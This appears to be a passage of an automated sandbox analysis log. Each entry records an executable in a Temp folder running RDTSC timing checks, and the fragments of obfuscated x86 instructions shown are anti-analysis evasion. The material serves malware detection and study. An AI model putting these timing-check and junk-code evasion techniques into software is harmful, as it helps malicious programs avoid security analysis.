Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4537E2 second address: 453802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F4784F102D3h 0x0000000b jnp 00007F4784F102C6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 453802 second address: 453844 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4785B0BF5Bh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4785B0BF53h 0x0000000f push ecx 0x00000010 jmp 00007F4785B0BF4Bh 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jg 00007F4785B0BF46h 0x00000022 jnl 00007F4785B0BF46h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 45FFDA second address: 45FFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 466459 second address: 46647B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4785B0BF51h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F4785B0BF46h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 46647B second address: 46649C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4784F102D8h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 46649C second address: 4664A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4662F8 second address: 466301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 473B9E second address: 473BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 473BA2 second address: 473BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 473BA6 second address: 473BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 473BAC second address: 473BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F4784F102C6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 47370E second address: 47371D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 47371D second address: 473732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4784F102CBh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 473870 second address: 47387E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4751B9 second address: 4751CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F4784F102C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4751CA second address: 4751DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F4785B0BF46h 0x0000000c popad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4751DC second address: 4751E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4751E2 second address: 4751FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4785B0BF53h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 48BDE0 second address: 48BDF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4784F102CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 48DAB2 second address: 48DADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Ch 0x00000007 pushad 0x00000008 jmp 00007F4785B0BF56h 0x0000000d ja 00007F4785B0BF46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4B90C72 second address: 4B90C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4B90C76 second address: 4B90C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4B60812 second address: 4B60831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4784F102D2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4B60831 second address: 4B60837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4B60837 second address: 4B6083B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4BA0D96 second address: 4BA0DC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f mov di, cx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4785B0BF53h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4BA0DC1 second address: 4BA0DC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4BA0DC7 second address: 4BA0DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4785B0BF4Ah 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4BA0DEE second address: 4BA0DFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE RDTSC instruction interceptor: First address: 4BA0DFD second address: 4BA0E02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0E02 second address: 4BA0E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4784F102D5h 0x0000000a add esi, 2B10DDF6h 0x00000010 jmp 00007F4784F102D1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F4784F102D3h 0x00000023 movzx eax, di 0x00000026 popad 0x00000027 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20B0A second address: 4B20B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20B0E second address: 4B20B14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20B14 second address: 4B20B40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov dx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F4785B0BF52h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov edi, 11BDC830h 0x0000001c mov dh, 37h 0x0000001e popad 0x0000001f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20B40 second address: 4B20BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e pushad 0x0000000f push ebx 0x00000010 pushfd 0x00000011 jmp 00007F4784F102D0h 0x00000016 sbb eax, 5C422FA8h 0x0000001c jmp 00007F4784F102CBh 0x00000021 popfd 0x00000022 pop ecx 0x00000023 pushfd 0x00000024 jmp 00007F4784F102D9h 0x00000029 sbb cl, FFFFFFC6h 0x0000002c jmp 00007F4784F102D1h 0x00000031 popfd 0x00000032 popad 0x00000033 push dword ptr [ebp+0Ch] 0x00000036 jmp 00007F4784F102CEh 0x0000003b push dword ptr [ebp+08h] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B20BBE second address: 4B20BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50923 second address: 4B50929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50929 second address: 4B5092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B5092D second address: 4B5096F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a call 00007F4784F102D4h 0x0000000f movzx esi, di 0x00000012 pop ebx 0x00000013 movzx ecx, di 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F4784F102CFh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov cx, 445Dh 0x00000028 popad 0x00000029 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA04BA second address: 4BA04BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA04BE second address: 4BA04C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA04C2 second address: 4BA04C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA04C8 second address: 4BA0515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4784F102D0h 0x0000000f push eax 0x00000010 jmp 00007F4784F102CBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4784F102D5h 0x0000001d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0515 second address: 4BA056E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4785B0BF57h 0x00000009 or si, A15Eh 0x0000000e jmp 00007F4785B0BF59h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ax, 1435h 0x00000020 jmp 00007F4785B0BF52h 0x00000025 popad 0x00000026 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0423 second address: 4BA0433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4784F102CCh 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0433 second address: 4BA0437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0437 second address: 4BA044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4784F102CDh 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B60612 second address: 4B60616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B60616 second address: 4B6061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0898 second address: 4BA089E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA089E second address: 4BA08A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA08A4 second address: 4BA08A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA08A8 second address: 4BA08C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4784F102D1h 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50889 second address: 4B508DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 09h 0x0000000d pushfd 0x0000000e jmp 00007F4785B0BF51h 0x00000013 and ax, 7716h 0x00000018 jmp 00007F4785B0BF51h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007F4785B0BF4Eh 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B508DD second address: 4B508E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B508E1 second address: 4B508E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B90D4C second address: 4B90D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007F4784F102D3h 0x0000000a mov ax, 408Fh 0x0000000e pop esi 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4784F102CEh 0x00000018 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B90D7B second address: 4B90D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA072F second address: 4BA0733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0733 second address: 4BA0737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4BA0737 second address: 4BA073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B808DB second address: 4B8091F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F4785B0BF4Dh 0x00000010 mov ebp, esp 0x00000012 jmp 00007F4785B0BF4Eh 0x00000017 mov eax, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4785B0BF57h 0x00000021 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B8091F second address: 4B80937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4784F102D4h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B703B0 second address: 4B703B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B703B4 second address: 4B703D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F4784F102CDh 0x00000012 mov bh, ah 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B703D1 second address: 4B703D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30021 second address: 4B30036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30036 second address: 4B3003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3003C second address: 4B30089 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4784F102D4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 jmp 00007F4784F102CEh 0x00000017 call 00007F4784F102D2h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 mov edi, 639E68ACh 0x00000028 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30089 second address: 4B3017A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4785B0BF55h 0x00000008 adc cl, FFFFFF86h 0x0000000b jmp 00007F4785B0BF51h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F4785B0BF50h 0x00000019 xor ecx, 01836528h 0x0000001f jmp 00007F4785B0BF4Bh 0x00000024 popfd 0x00000025 popad 0x00000026 and esp, FFFFFFF8h 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F4785B0BF54h 0x00000030 and ecx, 50789788h 0x00000036 jmp 00007F4785B0BF4Bh 0x0000003b popfd 0x0000003c mov dx, si 0x0000003f popad 0x00000040 xchg eax, ecx 0x00000041 pushad 0x00000042 mov di, si 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F4785B0BF4Ah 0x0000004c jmp 00007F4785B0BF55h 0x00000051 popfd 0x00000052 jmp 00007F4785B0BF50h 0x00000057 popad 0x00000058 popad 0x00000059 push eax 0x0000005a jmp 00007F4785B0BF4Bh 0x0000005f xchg eax, ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 call 00007F4785B0BF4Bh 0x00000068 pop esi 0x00000069 jmp 00007F4785B0BF59h 0x0000006e popad 0x0000006f rdtsc
